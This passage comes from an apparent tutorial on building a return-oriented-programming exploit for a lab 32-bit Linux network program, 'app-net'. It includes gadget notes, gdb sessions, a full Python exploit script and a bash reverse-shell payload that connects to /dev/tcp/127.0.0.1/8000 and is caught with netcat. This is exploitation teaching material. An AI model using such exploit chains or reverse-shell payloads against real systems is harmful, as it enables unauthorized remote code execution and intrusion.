junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- ////bin/bash pointer now contains the correct address of ////bin/bash 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from ////bin/bash pointer to nearest null termination 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to null termination of 3rd arg 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of null termination of 3rd arg 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- 3rd arg nulls now contain 4 nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa7a : (0xaaaaaaaa - 48) = distance from edx to next nulls 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance from edx to -c nulls 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of -c nulls 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- -c nulls now contain 4 nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa2 : (0xaaaaaaaa - 8) = distance from edx to next nulls 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the last nulls from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of last nulls 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0805638b : mov edi, edx ; ret 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- last nulls now contain 4 nulls #################DATA################## ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff

At this point all of our strings should be correctly null terminated.

Let's test this, I won't post the exploit script to try and keep the size of this post down a little but all I've done is put the relevant values into the script in the order I've put them in my notes.

To make it easier to break at the end I've put a gadget that I haven't use elsewhere (at 0x808456c) so that I can just break at the end and inspect memory:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

(gdb) delete 3 (gdb) break *0x0808456c Breakpoint 4 at 0x808456c (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/appuser/app-net 0xbfffe930: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe940: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe950: 0x41414141 0x41414141 => 0x808456c <_dl_get_origin+28>: mov ecx,esi Breakpoint 4, 0x0808456c in _dl_get_origin () 4: /x $edx = 0xbfffeb38 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0x0 1: /x $ebp = 0xeeeeeeee (gdb) display/x $ecx 5: /x $ecx = 0xbfffeb74 (gdb) x/xw 0xbfffeb74 0xbfffeb74: 0xbfffeb2c (gdb) x/s 0xbfffeb2c 0xbfffeb2c: "////bin/bash" (gdb) x/s 0xbfffeb2c + 18 0xbfffeb3e: "-c" (gdb) x/s 0xbfffeb2c + 18 + 6 0xbfffeb44: "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

So our 3 strings are now correctly null terminated.

I calculated the addresses from the value stored at the address that ecx points to (the address of the first pointer that we wrote earlier).

On line 18 I instruct gdb to display the value of ecx, I then use the examine command to display the string at the address contained there.

I then add 18 (the number of bytes until the -c string) and display that string and add another 6 (the number of bytes from that point to the next string) to display the last string.

Writing The Remaining Pointers

As with the code we just wrote I will not go through every step as the method I will use is the same.

I will be working out the address of the first pointer that I need to change (firstly being the pointer to the -c argument string) using eax and ebx and using edx as the point of reference.

I will then be putting that address into edx, working out the address of the string that that pointer should be pointing to using the same method (which stores the address in eax) and then writing the value that eax contains into the address pointed to by edx.

There are 2 pointers that we need to do this for, the pointer to -c and the pointer to the long string (the actual reverse shell).

If you've fully understood the post so far, this should be a reasonably trivial task.

Here is the section of my notes that do this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa6a : (0xaaaaaaaa - 64) = distance from edx to -c arg pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to -c arg pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of -c arg pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now edx contains address of -c arg pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa70 : (0xaaaaaaaa - 58) = distance from edx to -c arg string 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to -c arg string 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the address of -c arg string 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- now the -c arg pointer contains the address of -c string 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from edx to third arg pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the third pointer 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of third pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- edx contains the address of third pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa72: (0xaaaaaaaa - 56) = distance from edx to third arg string 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the third string 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of third string 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- third pointer contains address of third string

Now all of the pointers should point to the correct strings.

It's time to test it again, I will be using the same breakpoint trick I used last time:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

(gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/appuser/app-net 0xbfffea38: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffea48: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffea58: 0x41414141 0x41414141 => 0x808456c <_dl_get_origin+28>: mov ecx,esi Breakpoint 4, 0x0808456c in _dl_get_origin () 5: /x $ecx = 0xbfffeb74 4: /x $edx = 0xbfffeb7c 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0xbfffeb44 1: /x $ebp = 0xeeeeeeee (gdb) x/4xw 0xbfffeb74 0xbfffeb74: 0xbfffeb2c 0xbfffeb3e 0xbfffeb44 0x00000000 (gdb) x/s 0xbfffeb2c 0xbfffeb2c: "////bin/bash" (gdb) x/s 0xbfffeb3e 0xbfffeb3e: "-c" (gdb) x/s 0xbfffeb44 0xbfffeb44: "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

Great, so that worked perfectly.

Setting Up The Rest Of The Registers And Inserting The Last Of The Gadgets

We now have everything setup except for the values of the eax, ebx and edx registers.

edx just needs to point to 1 of the nulls that we wrote, ebx should contain the address of the ////bin/bash string and eax should contain the value 11.

We will deal with edx first because we have to use ebx and eax afterwards.

We will then calculate the address that needs to go into ebx.

Lastly we will get 11 into eax and finally run int 0x80.

Here are my full finished notes.

Finishing The Exploit And Testing It

Now that we've got the full size of the exploit we can calculate the size of our code and recalculate the distance from the address that we first receive to our data.

I done this using a python script with all of the gadgets in, you can find that script here.

This shows us that the distance is 908 bytes and not 1000 bytes.

To recalculate this we do the sum 0xaaaaaaaa - (908 + 88) = 0xaaaaa6c6, so this is the new value that we need to pop into ebx at the start of our application to calculate the first address.

Now we have finished writing the exploit:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407

#!/usr/bin/env python import socket payload = "A" * 532 payload += "\x5a\x71\x07\x08" # ebp = esp payload += "\xd0\x25\x05\x08" # xchg eax, ebp payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the distance to the end of the payload payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\xc6\xa6\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xab\x32\x07\x08" # eax += ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Write 0 to the end of the data payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Work out the distance to 0xbbbbbbbb payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x9e\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Move address value into ecx payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xa2\xdc\x04\x08" # ecx = eax payload += "\xee\xee\xee\xee" ############### Work out the distance to ////bin/bash string payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x62\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the address of ////bin/bash string and write to pointer payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x21\x3f\x08\x08" # [edx] = eax ############### Work out the distance to null termination of last string payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\xa6\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx payload += "\xee\xee\xee\xee" # (= distance to last string termination) payload += "\xee\xee\xee\xee" ############### Work out the address of null termination of last string payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Write nulls to that address payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Work out the address to -c string termination from edx payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x7a\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 48) distance to -c termination payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c termination) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Write nulls to -c termination payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Calculate the address of the last null termination payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\xa2\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to last termination payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last termination) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Write nulls to last termination payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Work out the address of the -c pointer and store in edx payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x6a\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to -c pointer payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xab\x32\x07\x08" # eax += ebx (= address of -c pointer) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the address of the -c string and write it payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x70\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 58) distance to -c string payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Work out the address of the last string pointer payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\xa6\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 4) distance to last pointer payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xab\x32\x07\x08" # eax += ebx (= address of last pointer) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the address of the last string and write it payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x72\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 56) distance to last string payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x21\x3f\x08\x08" # [edx] = eax ############### Work out the address of the nearest nulls to edx ############### and store in edx payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x9e\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to nearest nulls payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of nearest nulls) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the address of the /bin/bash string ############### and store in ebx payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x66\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 68) distance to /bin/bash string payload += "\xee\xee\xee\xee" # from edx payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of /bin/bash string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Calculate 11 into eax and initialize syscall payload += "\x76\x85\x0a\x08" # pop eax payload += "\xf4\xff\xff\x81" # (0x81ffffe9 + 11) 11 = execve syscall number payload += "\xcc\xa1\x0a\x08" # eax -= 0x81ffffe9 payload += "\x0d\x8c\x04\x08" # int 0x80 ##################### DATA ##################### payload += "////bin/bash" payload += "\xff\xff\xff\xff" payload += "\xff\xff" + "-c" payload += "\xff\xff\xff\xff" payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1" payload += "\xff\xff\xff\xff" payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash payload += "\xcc\xcc\xcc\xcc" # pointer to -c payload += "\xdd\xdd\xdd\xdd" # pointer to args payload += "\xff\xff\xff\xff" # create the tcp socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect to 127.0.0.1 port 9999 s.connect(("127.0.0.1", 9999)) # send our payload s.send(payload) # close the socket s.close()

Firstly we need to start netcat listening on port 8000 to catch the reverse shell:

1	testuser@dev:~$ nc -l -p 8000

Now we should launch the vulnerable application (notice I'm using a different user to make it more obvious when the exploit works):

1	appuser@dev:~$ ./app-net

Lastly we need to launch the exploit and watch the terminal that we are running netcat in:

1	testuser@dev:~$ python app-net-rop-exploit.py

Now looking at the terminal with netcat running and test by running some commands:

1 2 3 4 5 6 7 8 9

appuser@dev:/home/appuser$ pwd pwd /home/appuser appuser@dev:/home/appuser$ whoami whoami appuser appuser@dev:/home/appuser$ ls app-net ls app-net app-net

PWNED!!! :-D

Conclusion

It's important to realise that this exploit will not work against any other application, and might not even work with the same application run in a different environment (ie. on a different kernel version) or compiled with a different compiler or compiler version.

This is why it's so important to get as much information about the target environment as possible before developing an exploit for it.

That said, if you have understood this post you should now be able to develop a ROP exploit for any application on a 32 bit Linux system and beat both ASLR and NX, you just have to use the methodology we used here.

A bit of creativity needs to be used to create 1 of these exploits.

Happy Hacking :–)

Further Reading

I've not actually read anything relevant to ROP exploitation just simple explainations for how it works.